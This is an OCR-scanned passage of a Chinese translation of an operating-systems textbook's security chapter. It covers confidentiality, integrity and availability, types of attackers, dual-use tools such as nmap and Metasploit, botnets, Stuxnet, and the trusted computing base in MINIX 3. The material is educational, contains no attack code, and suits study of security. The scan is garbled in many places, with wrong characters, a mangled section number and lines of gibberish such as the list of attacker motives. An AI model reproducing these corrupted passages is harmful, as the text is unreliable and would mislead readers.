户 可 以 获取 非法 权限 。 

有 时 这 种 安全 模型 和 机 制 涉及 一 类 用 户 ， 而 非 单 个 用 户 。 例 如 ， 在 一 台 军 用 计算 机 中 ， 所 有 数据 都 
必须 被 标记 为 “绝密 ”“ 机 密 ”“ 秘 密 ” 或 “公开 ”， 而且 下 士 不 允许 查看 将 军 的 目录 ， 无 论 这 个 下 士 或 
将 军 是 谁 ， 都 禁止 越权 访问 。 在 过 去 的 几 十 年 中 ， 这 样 的 问题 被 反复 地 研究 、 报 道 和 解决 。 

当时 一 个 潜在 的 假设 是 ， 一 旦 选 定 了 一 个 模型 并 据 此 实现 了 安全 系统 ， 那 么 实现 该 系统 的 软件 也 是 
正确 的 ， 会 完全 执行 选 定 的 安全 策略 。 通 常情 况 下 ， 模 型 和 软件 都 非常 简单 ， 因 此 该 假设 常常 是 成 立 的 。 
举 个 例子 ， 如 果 理 论 上 不 允许 Tracy 查看 Camille 的 某 个 文件 ， 那 么 她 的 确 无 法 查看 。 

然而 ， 随 着 个 人 计算 机 、 平 板 电脑 、 智 能 手机 以 及 互联 网 的 普及 ， 情 况 发 生 了 变化 。 例 如 ， 很 多 设 
备 只 有 一 个 用 户 ， 因 此 一 个 用 户 窥探 其 他 用 户 文件 的 威胁 大 部 分 都 消失 了 。 当 然 ， 在 共享 的 服务 器 上 
(可 能 在 云 上 ) 并 不 是 这 样 。 在 这 里 ， 需 要 保证 用 户 之 间 的 严格 隔离 。 同 时 ， 窥 探 仍 然 在 发 生 。 例 如 在 
网 络 上 ， 如 果 Tracy 与 Camille 在 同一 个 WiFi 网 络 中 ， 那 么 她 们 就 能 拦截 对 方 的 所 有 网 络 数据 。 以 WiFi 为 
例 的 这 个 问题 并 不 是 一 个 新 问题 。 早 在 2000 多 年 前 ， 尤 利 乌 斯 : 恺 撒 就 面临 着 相同 的 问题 。 恺 撤 需要 给 
他 的 军团 和 盟友 发 送 消 息 ， 但 是 这 个 消息 有 可 能 被 敌人 截取 。 为 了 确保 敌人 不 能 读 取 命令 ， 恺 撤 使 用 了 
加 密 一 一 将 每 个 字母 替换 为 字母 表 中 左边 三 位 的 字母 。 因 此 ， 字 母 D 被 替换 为 字母 A， 字 母 E 被 替换 为 字 
母 B， 以 此 类 推 。 尽 管 今天 的 加 密 方式 更 加 复杂 ， 但 是 原理 是 一 样 的 : 如 果 不 能 获得 密 钥 ， 对 手 是 不 能 
读 取信 息 的 。 

然而 ， 这 并 不 总 是 奏效 的 ， 因 为 网 络 并 不 是 Tracy 监听 Camille 的 唯一 渠道 。 如 果 Tracy 能 够 入 侵 
Camille 的 电脑 ， 她 就 能 够 拦截 加 密 前 发 送 的 和 加 密 后 收 到 的 所 有 消息 。 入 侵 别 人 的 电脑 并 不 是 很 容易 ， 
但 也 没有 想象 中 困难 (通常 比 破解 别人 的 2048 位 加 密 密 钥 更 容易 ) 。 这 个 问题 是 由 Camille 电 脑 上 的 软 
件 错误 导致 的 。 对 于 Tracy 来 说 ， 幸 运 的 是 ， 日 益 庞 大 的 操作 系统 和 应 用 导致 系统 中 不 乏 错 误 。 当 错误 
涉及 安全 类 别 时 ， 我 们 称 之 为 漏洞 (vulnerability) 。 当 Tracy 发 现 Camille 的 软件 中 存在 漏洞 时 ， 她 通过 
向 软件 输入 特定 的 字 节 来 触发 错误 。 像 这 种 触发 错误 的 输入 通常 叫 作 漏洞 攻击 或 漏洞 利用 (exploit), 
成 功 的 漏洞 攻击 能 够 使 攻击 者 完全 控制 电脑 。 当 Camille 认 为 自己 是 电脑 上 的 唯一 用 户 时 ， 她 可 能 并 不 
孤单 。 
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攻击 者 可 以 通过 病毒 或 者 蠕虫 , 手动 或 者 自动 地 执行 漏洞 攻击 。 病 毒 和 蠕虫 的 区 别 并 不 是 非常 明显 。 
大 部 分 人 认为 病毒 至 少 需要 一 些 用 户 的 交互 才能 够 传播 。 例 如 ， 用 户 需要 点 击 一 个 附件 才 可 能 被 感染 。 
而 蠕虫 不 需要 用 户 的 交互 或 配合 ， 它 是 自传 播 的 。 它 们 的 传播 与 用 户 的 行为 无 关 ， 也 可 能 是 用 户 自愿 安 
装 了 攻击 者 的 代码 。 例 如 ， 攻 击 者 可 以 重 打包 流行 但 是 昂贵 的 软件 (例如 游戏 或 者 文字 处 理工 具 ) ， 并 
在 网 上 免费 发 布 。 对 于 很 多 用 户 来 说 ， 免 费 是 极为 诱 人 的 。 然 而 ， 安 装 免费 游戏 时 也 自动 安装 了 额外 的 
功能 ， 这 些 功能 将 计算 机 以 及 上 面 的 所 有 东西 都 交 给 远方 的 计算 机 罪犯 。 这 种 软件 叫 作 特洛伊 木马 ， 也 
是 我 们 稍 后 将 简要 讨论 的 主题 。 

基于 以 上 问题 ， 本 章 将 分 为 两 个 主要 部 分 进行 讨论 。 首 先 详 细 介绍 安全 的 现状 ， 包 括 威胁 和 攻击 
(9.1 节 )、 安 全 和 攻击 的 本 质 (9.2 节 )、 不 同 的 访问 控制 方法 (9.3 节 ) 以 及 安全 模型 (9.4 节 ) 。 除 此 之 外 ， 
我 们 还 将 探讨 安全 中 的 核心 方法 一 一 密码 学 (9.5 节 )， 以 及 不 同 的 安全 认证 方式 (9.647). 

到 目前 为 止 ， 我 们 还 没有 面临 什么 实质 威胁 ， 然 而 现实 并 非 如 此 。 接 下 来 的 四 节 将 讨论 实际 存在 的 
安全 问题 ， 包 括 攻击 者 使 用 的 控制 计算 机 系统 的 技巧 ， 以 及 为 防止 这 种 情况 的 发 生 而 采取 的 应 对 措施 。 
我 们 还 会 讨论 内 部 攻击 以 及 各 种 不 同 的 电子 病毒 。 最 后 ， 我 们 简单 地 讨论 计算 机 安全 相关 的 研究 现状 并 
对 本 章 进 行 总 结 。 

值得 注意 的 是 ， 尽 管 本 书 是 关于 操作 系统 的 ， 然 而 操作 系统 安全 与 网 络 安全 之 间 却 有 着 不 可 分 割 的 
联系 ， 无 法 将 它们 分 开 来 讨论 。 例 如 ， 病 毒 通过 网 络 侵入 计算 机 中 ， 进 而 影响 了 操作 系统 。 总 而 言 之 ， 
为 了 更 加 充分 地 展开 讨论 ， 本 书 会 包含 一 些 与 主题 紧密 相关 但 严格 意义 上 却 并 不 属于 操作 系统 研究 领域 
的 资料 或 论述 。 l 
9.1 环境 安全 

我 们 从 几 个 术语 的 定义 来 开始 本 章 的 学 习 。 有 些 人 不 加 区 分 地 使 用 “安全 ”(security) 和 “防护 ” 
(protection) 两 个 术语 。 然 而 ， 当 我 们 讨论 基本 问题 时 有 必要 区 分 “安全 ”与 “防护 ”的 含义 ， 例 如 ， 
确保 文件 不 被 未 经 授权 的 人 读 取 或 自 改 。 这 些 问 题 一 方面 包括 涉及 技术 、 管 理 、 法 律 和 政治 方面 的 问题 ， 
另 一 方面 也 包括 使 用 特定 的 操作 系统 机 制 来 提供 安全 保障 的 问题 。 为 了 避免 混淆 ， 我 们 用 术语 安全 来 表 
示 所 有 的 基本 问题 ， 用 术语 防护 机 制 来 表示 用 特定 的 操作 系统 机 制 确保 计算 机 信息 安全 。 但 是 两 个 术语 
之 间 的 界限 没有 严格 定义 。 接 下 来 我 们 看 一 看 安全 问题 的 特点 是 什么 ， 稍 后 我 们 将 研究 防护 机 制 和 安全 
模型 以 帮助 获取 安全 屏障 。 
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很 多 安全 方面 的 文章 将 信息 系统 的 安全 分 解 为 三 个 部 
分 : 机 密 性 ， 完 整 性 和 可 用 性 。 它 们 通常 被 称 为 CIA 
(Confidentiality, Integrity, Availability) 。 如 图 9-1 所 示 ， 它 
们 构成 了 我 们 严防 攻击 和 窃听 的 核心 安全 属性 。 

第 一 个 安全 属性 是 机 密 性 ， 指 的 是 将 机 密 的 数据 置 于 保 et SS nae 
密 状 态 。 更 确切 地 说 ， 如 果 数 据 所 有 者 决定 这 些 数据 仅 用 于 特定 的 人 ， 那 么 系统 就 应 该 保证 数据 绝对 不 
会 发 布 给 未 经 授权 的 人 。 数 据 所 有 者 至 少 应 该 有 能 力 指定 谁 可 以 阅读 哪些 信息 ， 而 系统 则 对 用 户 的 选择 
进行 强制 执行 ， 这 种 执行 的 粒度 应 该 精确 到 文件 。 

第 二 个 安全 属性 是 完整 性 ， 指 未 经 授权 的 用 户 没有 得 到 许可 就 擅自 改动 数据 。 这 里 所 说 的 改动 不 仅 
是 指 改变 数据 的 值 ， 而 且 还 包括 删除 数据 以 及 添加 错误 的 数据 等 情况 。 如 果 系 统 在 数据 所 有 者 决定 改动 
数据 之 前 不 能 保证 其 原封 未 动 ， 那 么 这 样 的 安全 系统 就 毫 无 价值 可 言 。 

第 三 个 安全 属性 是 可 用 性 ， 指 没有 人 可 以 扰乱 系统 使 之 竣 疫 。 导 致 系统 拒绝 服务 的 攻击 十 分 普遍 。 
比如 ， 如 果 有 一 台 计 算 机 作为 Internet 服 务 器 ， 那 么 不 断 地 发 送 请 求 会 使 该 服务 器 瘫痪 ， 因 为 单 是 检查 和 
丢弃 进来 的 请 求 就 会 吞噬 掉 所 有 的 CPU 资源 。 在 这 样 的 情况 下 ， 若 系统 处 理 一 个 阅读 网 页 的 请 求 需要 
100ks， 那 么 任何 人 每 秒 发 送 10 000 个 这 样 的 请 求 就 会 导致 系统 死机 。 许 多 合理 的 系统 模型 和 技术 能 够 
保证 数据 的 机 密 性 和 完整 性 ， 但 是 避免 拒绝 服务 却 相当 困难 。 

后 来 ， 人 们 认为 三 个 基本 属性 不 能 满足 所 有 场景 ， 因 此 又 增添 了 一 些 额 外 属性 ， 例 如 真实 性 、 可 审 
计 性 、 不 可 否认 性 、 隐 私 性 以 及 一 些 其 他 诸如 此 类 的 属性 。 显 然 ， 这 些 都 是 不 错 的 。 但 尽管 如 此 ， 初 始 
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的 三 个 基本 属性 仍旧 在 安全 专家 的 心中 占据 着 特殊 的 地 位 。 

系统 不 断 地 受到 攻击 者 的 威胁 。 例 如 ， 攻 击 者 可 以 窃听 局 域 网 中 的 通信 ， 破 坏 信 息 的 机 密 性 ， 尤 其 
是 当 通 信 协 议 没 有 加 密 的 时 候 。 同 样 ， 入 侵 者 可 以 攻击 数据 库 ， 删 除 和 修改 一 些 记录 ， 破 坏 数 据 的 完整 
性 。 精 细 的 拒绝 服务 攻击 可 能 会 破坏 一 个 或 多 个 计算 机 系统 的 可 用 性 。 

外 部 的 人 有 很 多 种 方法 可 以 攻击 系统 ， 我 们 将 在 本 章 的 后 面 进行 讨论 。 很 多 种 攻击 现在 被 先进 的 工 
具 和 服务 所 支持 。 一 些 工 具 是 由 所 谓 的 “ 黑 帽 ”黑客 所 开发 的 ， 另 外 一 些 是 由 “ 白 帽 ”所 开发 的 。 就 像 
西方 老 电 影 中 那样 ， 数 字 世 界 中 的 坏人 戴 着 黑 帽 子 ， 骑 着 特洛伊 木马 ;而 好 的 黑客 戴 着 白色 的 帽子 并 且 
比 他 们 的 敌人 编码 更 快 。 

顺便 说 下 ， 大 众 媒体 倾向 于 使 用 通用 术语 “黑客 ”(hacker) 来 专 指 黑 帽 。 然 而 ， 在 计算 机 世界 中 ， 
“黑客 ”是 一 个 保留 给 伟大 程序 员 的 荣誉 称号 。 虽 然 其 中 一 些 是 恶意 的 程序 员 ， 但 是 大 部 分 都 不 是 。 媒 
体 在 这 方面 理解 有 错误 。 考 虑 到 真正 的 黑客 ,我们 将 使 用 术语 的 原始 意义 ， 并 且 称 那些 试图 问 入 计算 机 
系统 但 不 属于 破解 者 或 者 黑 帽 的 那些 人 为 黑客 。 

回 到 攻击 工具 ， 令 人 惊奇 的 是 ， 很 多 攻击 工具 是 由 白 帽 人 员 开发 的 。 其 原因 是 ， 虽 然 很 多 坏人 也 使 
用 这 些 工 具 ， 但 主要 目的 是 将 其 作为 方便 的 方式 来 测试 计算 机 系统 或 者 网 络 的 安全 性 能 。 例 如 ，nmap 这 
个 工具 可 以 通过 端口 扫描 来 判断 计算 机 系统 所 提供 的 网 络 服务 。 其 中 nmap 提 供 的 一 个 最 简单 的 扫描 技术 
是 尝试 与 计算 机 系统 中 的 每 一 个 可 能 的 端口 号 建立 TCP 连 接 。 如 果 端 口 连接 设置 成 功 ， 那 么 必须 有 一 个 
服务 程序 在 监听 端口 。 此 外 ， 由 于 很 多 服务 使 用 众所周知 的 端口 号 ， 这 就 使 得 安全 测试 者 (或 者 攻击 者 ) 
能 够 详细 查 明 这 人 台 机 器 上 面 运行 了 哪些 服务 。 然 而 从 另 一 个 角度 来 看 ，nmap 对 攻击 者 和 防御 者 都 是 有 用 
的 ， 也 就 是 具有 双重 用 途 这 一 属性 。 另 外 一 组 工具 统称 dsniff， 提 供 各 种 方法 来 监控 网 络 流 量 和 重 定向 
网 络 数据 包 。LOIC (Low Orbit Ion Cannon) 不 仅 是 一 个 用 来 摧毁 遥远 星系 上 的 敌人 的 科幻 武器 ， 同 时 
也 是 一 个 用 来 实施 拒绝 服务 攻击 的 工具 。 它 使 用 了 Metasploit 框 架 ， 同 时 加 载 了 数 以 百 计 的 针对 各 种 目 
标的 攻击 漏洞 。 实 施 攻击 从 来 都 不 是 一 件 简单 的 事情 。 需 要 明确 的 是 ， 这 些 工具 都 有 “双重 用 途 ”的 问 
题 。 就 像 刀 和 佬 子 一 样 ， 它 们 本 身 并 不 坏 。 

然而 ， 网 络 罪 犯 同 时 提供 了 一 系列 (通常 是 在 线 的 ) 服务 来 试图 成 为 网 络 的 主宰 : 传播 恶意 软件 ， 
洗 黑钱 ,流量 重 导向 ， 为 主机 提供 没有 问题 的 策略 ， 以 及 很 多 其 他 有 用 的 东西 。 大 部 分 网 络 上 的 犯罪 活 
动 都 是 基于 僵尸 网 络 建立 的 ， 它 包含 成 千 上 万 (有 时 候 是 上 百 万 ) 受到 危害 的 电脑 一 一 通常 是 无 境 和 不 
知情 的 用 户 使 用 的 普通 电脑 。 攻 击 者 有 很 多 种 方式 可 以 侵害 用 户 的 电脑 。 例 如 ， 他 们 能 提供 流行 软件 的 
免费 但 是 恶意 的 版 本 。 可 悲 的 是 这 些 受 感 染 的 昂贵 软件 的 免费 版 本 (破解 版 ) 对 于 很 多 用 户 来 说 是 极其 
诱 人 的 。 不 幸 的 是 ， 安 装 这 些 程序 能 够 让 攻击 者 完全 控制 用 户 的 机 器 。 就 像 是 将 你 房子 的 钥匙 交 给 一 个 
完美 的 陌生 人 。 当 电脑 完全 被 攻击 者 所 控制 的 时 候 ， 它 就 会 被 称 为 机 器 人 或 者 僵尸 。 特 别 是 ， 这 些 对 用 
户 来 说 都 是 不 可 见 的 。 现 在 ， 包 含 成 千 上 万 台 僵 尸 电脑 的 僵尸 网 络 是 实施 网 络 犯罪 活动 的 主要 途径 。 数 
十 万 台 机 器 足够 用 来 偷窃 银行 信息 或 发 送 垃圾 邮件 ， 设 想 一 下 ，100 万 台 僵 尸 机 器 针对 一 个 毫 不 知情 的 
目标 发 动 攻击 是 一 件 多 么 可 怕 的 事情 。 

有 时 候 攻 击 的 影响 会 超越 计算 机 系统 本 身 ， 对 现实 世界 也 会 有 影响 。 其 中 一 个 例子 是 针对 谢 大 利 亚 
昆士兰 马 芦 奇 郡 ( 离 布 里 斯 班 不 远 ) 的 废弃 管理 系统 的 攻击 。 一 个 排污 系统 安装 公司 的 前 雇员 对 马 芦 奇 
郡 议会 拒绝 他 的 工作 申请 心怀 不 满 ， 他 决定 进行 报复 。 他 掌握 了 污水 处 理 系统 的 控制 权 ， 造 成 上 百 万 升 
未 经 处 理 的 污水 溢 入 公园 、 河 流 、 沿 岸 水 域 (其 中 的 鱼 类 迅速 死亡 ) 以 及 其 他 地 方 。 

更 为 普遍 的 是 ， 有 些 人 对 某 些 国家 或 种 族 不 满 ， 或 是 对 世界 感到 愤怒 ， 亡 图 摧毁 尽 可 能 多 的 基础 设 
施 ， 而 不 在 意 破 坏 性 和 受害 者 。 这 些 人 常常 觉得 攻击 “敌人 ”的 电脑 是 一 件 令 人 愉悦 的 事情 ， 而 并 不 在 
E “Bh” AF. : 

另 一 个 极端 是 网 络 战 。 一 个 通常 被 称 为 “ 震 网 ”病毒 的 网 络 战 武器 破坏 了 伊朗 在 纳 坦 兹 的 铀 浓缩 设 
施 ， 据 说 这 使 得 伊朗 的 核 计划 显 著 放 缓 。 虽 然 没有 人 站 出 来 声称 对 这 次 攻击 事件 负责 ， 但 此 次 事件 可 能 
是 一 个 或 多 个 伊朗 的 敌对 国家 的 秘密 组 织 发 动 的 。 

安全 问题 的 另 一 个 与 保密 性 相关 的 重要 方面 是 隐私 (privacy)， 即 保证 私人 的 信息 不 被 滥用 。 隐 私 
会 导致 许多 法 律 和 道德 问题 。 政 府 是 否 应 该 为 每 个 人 编制 档案 来 追查 罪犯 (如 盗窃 犯 或 逃税 犯 ) ? 警察 
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是 否 可 以 为 了 制止 有 组 织 犯 罪 而 调查 任何 人 或 任何 事件 ? 美国 国家 安全 机 构 是 否 可 以 为 了 抓 住 潜在 的 恐 
怖 分 子 而 每 天 监视 数 百 万 台 手 机 ? 雇主 和 保险 公司 有 权利 知道 个 人 隐私 吗 ? 当 这 些 特权 与 个 人 权益 发 生 
冲突 时 会 怎么 样 ? 这 些 话 题 都 是 十 分 重要 的 ， 但 是 它们 超出 了 本 书 的 范围 。 


9.1.2 入 侵 者 

我 们 中 的 大 多 数 人 非常 善良 并 且 守法 ， 那 么 为 什么 要 担心 安全 问题 呢 ? 因为 ， 我 们 周围 还 有 少数 人 
并 不 友好 ， 他 们 总 是 想 车 麻烦 〈 可 能 为 了 自己 的 商业 利益 ) 。 从 安全 性 的 角度 来 说 ， 那 些 喜 欢 冯 人 与 自 
己 毫 不 相干 区 域 的 人 叫 作 攻击 者 (attacker), AB (intruder) 或 敌人 (adversary)。 在 几 十 年 前 ， 破 
解 计 算 机 系统 是 为 了 向 朋友 展示 你 有 多 聪明 , 但 是 现在 , 这 不 再 是 破解 一 个 系统 唯一 或 者 最 主要 的 原因 。 
有 很 多 不 同类 型 的 攻击 者 ， 他 们 有 着 不 同 的 动机 : Moi, BHAA AA, KEER, BEN, WA 
R. MRED), HABE, RAVER. RUE. A, (ARKHAM TER, RTA 
全 性 有 多 差 。 

攻击 者 的 范围 从 技术 不 是 很 精湛 的 黑客 爱好 者 (也 称 为 脚本 爱好 者 ) ， 到 极其 精通 技术 的 黑客 。 他 
们 可 能 专门 为 了 罪犯 、 政 府 〈 如 警察 、 军 队 或 者 情报 部 门 ) 或 者 安全 公司 工作 ， 或 者 只 是 在 业余 时 间 开 
展 “ 黑 客 ”行为 的 业余 爱好 者 。 应 该 明确 的 是 ， 试 图 阻止 敌对 的 外 国政 府 窃取 军事 机 密 与 阻止 学 生 往 系 
统 中 插入 一 个 有 趣 的 信息 是 完全 不 同 的 。 安 全 与 保护 所 需 的 工作 量 显然 取决 于 谁 是 敌人 。 


9.2 操作 系统 安全 


破坏 计算 机 系统 的 安全 性 有 许多 方法 ， 这 些 方法 通常 并 不 复杂 。 例 如 ， 许 多 人 把 他 们 的 PIN 码 设置 
为 0000， 或 者 把 密码 设置 为 password 一 一 容易 记 ， 但 不 是 很 安全 。 还 有 些 人 恰恰 相反 ， 他 们 会 挑选 很 复 
杂 的 密码 ， 这 样 他 们 很 难 记 住 ， 以 至 于 不 得 不 把 密码 写 到 便利 贴 上 并 粘 在 屏幕 或 者 键盘 上 。 这 样 ， 任 何 
能 够 接触 这 人 台 机 器 的 人 (包括 保洁 员 、 秘 书 以 及 所 有 游客 ) 都 可 以 访问 计算 机 上 的 所 有 信息 。 还 有 很 多 
其 他 的 例子 ， 包 括 高 管 丢 失 带 有 敏感 信息 的 U 盘 ， 存 有 商业 机 密 的 老 硬 盘 在 未 被 正确 擦 除 之 前 就 被 丢 进 
垃圾 箱 等 。 

然而 ， 一 些 最 重要 的 安全 事故 是 由 复杂 的 网 络 攻击 导致 的 。 在 本 书 中 ， 我 们 只 关注 涉及 操作 系统 
的 攻击 。 换 名 话说， 我 们 将 不 会 涉及 网 络 攻击 或 针对 SQL 数据 库 的 攻击 。 相 反 ， 我 们 关注 的 是 以 操作 
系统 为 攻击 目标 ， 或 是 在 安全 策略 执行 中 操作 系统 起 到 重要 作用 (或 更 常见 的 是 未 能 起 到 作用 ) 的 攻 
击 行为 。 

一 般 来 说 ， 我 们 将 攻击 分 为 被 动 攻击 与 主动 攻击 。 被 动 攻击 试图 窃取 信息 ， 而 主动 攻击 会 使 计算 机 
程序 行为 异常 。 被 动 攻击 的 一 个 例子 是 ， 窃 听 者 通过 嗅 探 网 络 数据 并 试图 破解 加 密 信息 (如果 加 密 的 话 ) 
以 获得 明文 数据 。 在 主动 攻击 中 ， 入 侵 者 可 以 控制 用 户 的 网 页 浏览 器 来 执行 恶意 代码 ， 例 如 窃取 信用 卡 
信息 等 。 同 样 ， 我 们 也 将 加 密 和 程序 加 固 区 分 开 来 。 加 密 是 将 一 个 消息 或 者 文件 进行 转 码 ， 除 非 获 得 窗 
钥 ， 否 则 很 难 恢复 出 原 信息 。 程 序 加 固 是 指 在 程序 中 加 入 保护 机 制 从 而 使 得 攻击 者 很 难 破坏 程序 。 操 作 
系统 在 很 多 地 方 使 用 加 密 : 在 网 络 上 安全 传输 数据 ， 在 硬盘 上 安全 存储 文件 ， 将 密码 存储 在 密码 文件 中 
等 。 程 序 加 固 在 操作 系统 中 也 被 广泛 使 用 : 阻止 攻击 者 在 运行 的 软件 中 插入 新 代码 ， 确 保 每 一 个 进程 都 
遵循 了 最 小 权限 规则 (拥有 的 权限 与 需要 的 权限 完全 一 致 )。 


9.2.1 可 信和 系统 

如 今 ， 报 纸 上 总 是 经 常 能 看 到 攻击 者 破解 计算 机 系统 、 窗 取信 息 或 者 控制 数 百 万 台 计算 机 等 类 似 的 
故事 。 天 真 的 人 可 能 会 问 下 面 两 个 问题 : 

1) 建立 一 个 安全 的 操作 系统 有 可 能 吗 ? 

2) 如 果 可 能 ， 为 什么 不 去 做 呢 ? 

第 一 个 问题 的 答案 原则 上 是 肯定 的 。 理 论 上 ， 软 件 是 可 以 避免 错误 的 ， 我 们 甚至 可 以 验证 它 是 安全 
的 一 一 只 要 软件 不 是 过 大 或 者 过 于 复杂 。 不 幸 的 是 ， 今 天 的 计算 机 系统 极其 复杂 ， 这 与 第 二 个 问题 有 很 
大 关系 。 第 二 个 问题 是 ， 为 什么 不 建立 一 个 安全 系统 ?主要 原因 有 两 个 。 首 先 ， 现 代 系 统 虽 然 不 安全 但 
是 用 户 不 愿 抛弃 它们 。 假 设 Microsoft 宣 布 除 了 Windows 外 还 有 一 个 新 的 SecureOS 产 品 ， 并 保证 不 会 受到 
病毒 感染 但 不 能 运行 Windows 应 用 程序 ， 那 么 很 少 会 有 用 户 和 公司 把 Windows 像 个 波 手 山芋 一 样 扔 掉 转 
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而 立即 购买 新 的 系统 。 事 实 上 Microsoft 的 确 有 一 款 安全 OS (Fandrich A, 2006) ， 但 是 并 设 有 投入 商业 
市 场 。 ; 

第 二 个 原因 更 为 敏感 。 现 在 已 知 的 建立 安全 系统 仅 有 的 办 法 是 保持 系统 的 简单 性 。 特 性 是 安全 的 大 
敌 。 市 场 营销 人 员 努 力 让 公司 相信 (无 论 是 正确 还 是 错误 的 ) 用 户 想 要 的 是 更 多 的 特性 。 他 们 确保 系统 
架构 师 设计 产品 时 能 够 领会 这 个 含义 。 更 多 的 特性 意味 着 更 大 的 复杂 性 、 更 多 的 代码 以 及 更 多 的 安全 性 
错误 等 。 

这 里 有 两 个 简单 的 例子 。 最 早 的 电子 邮件 系统 通过 ACSII 文 本 发 送 消息 。 它 们 非常 简单 并 且 是 绝对 
安全 的 。 除 非 邮件 系统 存在 漏洞 ， 否 则 几乎 没有 ASCII 文 本 可 能 对 计算 机 系统 造成 损失 (本 章 后 面 会 六 
述 ， 一 些 攻 击 手 段 还 是 可 以 通过 此 方式 发 动 攻击 的 ) 。 然 后 人 们 想方设法 扩展 电子 邮件 的 功能 ， 引 入 了 
其 他 类 型 的 文档 ， 如 可 以 包含 宏 程序 的 Word 文 件 。 读 这 样 的 文件 意味 着 在 自己 的 计算 机 上 运行 别人 的 程 
序 。 无 论 沙 盒 怎么 有 效 ， 在 自己 的 计算 机 上 运行 别人 的 程序 必定 比 ASCII 文 本 要 危险 得 多 。 是 用 户 要 求 
从 被 动 的 文本 改 为 主动 的 程序 吗 ? 大 概 不 是 吧 ， 但 有 人 认为 这 是 个 极 好 的 主意 ， 而 设 有 考虑 到 隐 含 的 安 
全 问题 。 

第 二 个 例子 是 关于 网 页 的 。 过 去 的 被 动 式 HTML 网 页 没有 造成 大 的 安全 问题 (虽然 非法 网 页 也 可 能 
导致 缓冲 溢出 攻击 )。 现 在 许多 网 页 都 包含 了 可 执行 程序 (Applet 和 JavaScript) ， 用 户 不 得 不 运行 这 些 程 
序 来 浏览 网 页 内 容 ， 结 果 一 个 又 一 个 安全 漏洞 出 现 了 。 即 便 一 个 漏洞 被 补 上 ， 又 会 有 新 的 漏洞 显现 出 来 。 
当 网 页 完全 是 静态 的 时 候 ， 是 用 户 要 求 增加 动态 内 容 的 吗 ? 可 能 动态 网 页 的 设计 者 也 记 不 得 了 ， 但 随 之 
而 来 是 大 量 的 安全 问题 。 这 就 像 负 责 说 “不 ”的 副 总 统 在 指挥 时 睡 着 了 。 

实际 上 ， 确 实 有 些 组 织 认为 ， 与 非常 漂亮 的 新 功能 相 比 ， 好 的 安全 性 更 为 重要 。 军 方 组 织 就 是 一 个 
重要 的 例子 。 在 接 下 来 的 几 节 中 ,我 们 将 研究 相关 的 一 些 问 题 ， 不 过 这 些 问 题 不 是 几 句 话 便 能 说 清楚 的 。 
要 构建 一 个 安全 的 系统 ， 需 要 在 操作 系统 的 核心 中 实现 安全 模型 ， 且 该 模型 要 非常 简单 ， 从 而 设计 人 员 
确实 能 够 理解 模型 的 内 涵 ， 并 且 顶 住所 有 压力 ， 人 避免 偏离 安全 模型 的 要 求 去 添加 新 的 功能 特性 。 


9.2.2 可 信 计 算 基 

在 安全 领域 中 ， 人 们 通常 讨论 可 信 系 统 而 不 是 安全 系统 。 这 些 系统 在 形式 上 申明 了 安全 要 求 并 满足 
了 这 些 安全 要 求 。 每 一 个 可 信 系 统 的 核心 是 最 小 的 可 信 计 算 基 (Trusted Computing Base，TCB) ， 其 中 
包含 了 实施 所 有 安全 规则 所 必需 的 硬件 和 软件 。 如 果 这 些 可 信 计 算 基 根 据 系 统 规约 工作 ， 那 么 ， 无 论 发 
生 了 什么 错误 ， 系 统 安全 性 都 不 会 受到 威胁 。 

典型 的 TCB 包 括 了 大 多 数 的 硬件 (除了 不 影响 安全 性 的 1/O 设 备 ) 、 操 作 系 统 核心 中 的 一 部 分 、 大 多 
数 或 所 有 掌握 超级 用 户 权 限 的 用 户 程序 (如 UNIX 中 的 SETUID 根 程序 ) 等 。 必 须 包含 在 TCB 中 的 操作 系 
统 功 能 有 : 进程 创建 、 进 程 切换 、 内 存 面 管理 以 及 部 分 的 文件 和 IO 管理 。 在 安全 设计 中 ， 为 了 减少 空 
间 以 及 纠正 错误 ，TCB 通 常 完全 独立 于 操作 系统 的 其 他 部 分 。 

TCB 中 的 一 个 重要 组 成 部 分 是 访问 监视 器 ， 如 图 9-2 所 示 。 访 问 监视 器 接受 所 有 与 安全 有 关 的 系统 
请 求 (如 打开 文件 等 )， 然 后 决定 是 否 允 许 运行 。 访 问 监视 器 要 求 所 有 的 安全 问题 决策 都 必须 在 同一 处 
考虑 ， 而 不 能 跳 过 。 大 多 数 的 操作 系统 并 不 是 这 样 设计 的 ， 这 也 是 它们 导致 不 安全 的 部 分 原因 。 


用 户 空 间 


所 有 系统 调用 通过 访问 


监视 器 进行 安全 检查 


内 核 空间 





图 9-2 访问 监视 器 
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现今 安全 研究 的 一 个 目标 是 将 可 信 计 算 基 中 数 百 万 行 的 代码 缩短 为 只 有 数 万 行 代码 。 在 图 1-26 中 我 
们 看 到 了 MINIX 3 操作 系统 的 结构 。MINIX 3 是 与 POSIX 兼 容 的 系统 ， 但 又 与 Linux 或 FreeBSD 有 着 完全 
不 同 的 结构 。 在 MINIX 3 中 ,只 有 10 000 行 左右 的 代码 在 内 核 中 运行 。 其 余部 分 作为 用 户 进程 运行 。 其 
中 ， 如 文件 系统 和 进程 管理 器 是 可 信 计 算 基 的 一 部 分 ， 因 为 它们 与 系统 安全 息息相关 ; 但 是 诸如 打印 机 
驱动 和 音频 驱动 这 样 的 程序 并 不 作为 可 信 计 算 基 的 一 部 分 ， 因 为 不 管 这 些 程序 出 了 什么 问题 ， 它 们 的 行 
为 也 不 可 能 危及 系统 安全 。MINIX 3 将 可 信 计 算 基 的 代码 量 减 少 了 两 个 数量 级 ， 从 而 潜在 地 比 传统 系统 
设计 有 更 高 的 安全 性 。 | 


9.3 保护 机 制 


如 果 有 一 个 清晰 的 模型 来 制定 哪些 事情 是 允许 做 的 ， 以 及 系统 的 哪些 资源 需要 保护 ， 那 么 实现 系统 
安全 将 会 简单 得 多 。 安 全 方面 的 研究 已 有 很 多 成 果 ， 这 里 我 们 也 只 是 浅 尝 辑 止 。 我 们 将 着 重 论述 几 个 有 
普遍 性 的 模型 ， 以 及 增强 它们 的 机 制 。 


9.3.1 保护 域 

计算 机 系统 里 有 许多 需要 保护 的 “对 象 ”。 这 些 对 象 可 以 是 硬件 (如 CPU、 内 存 页 、 磁 盘 驱 动 器 或 
打印 机 ) 或 软件 (如 进程 、 文 件 、 数 据 库 或 信号 量 )。 

每 一 个 对 象 都 有 用 于 调用 的 单一 名 称 和 允许 进程 运行 的 有 限 的 一 系列 操作 。read 和 write 是 相对 文 
件 而 言 的 操作 ，up 和 down 是 相对 信号 量 而 言 的 操作 。 

显而易见 的 是 ， 我 们 需要 一 种 方法 来 禁止 进程 对 某 些 未 经 授权 的 对 象 进行 访问 。 而 且 这 样 的 机 制 必 
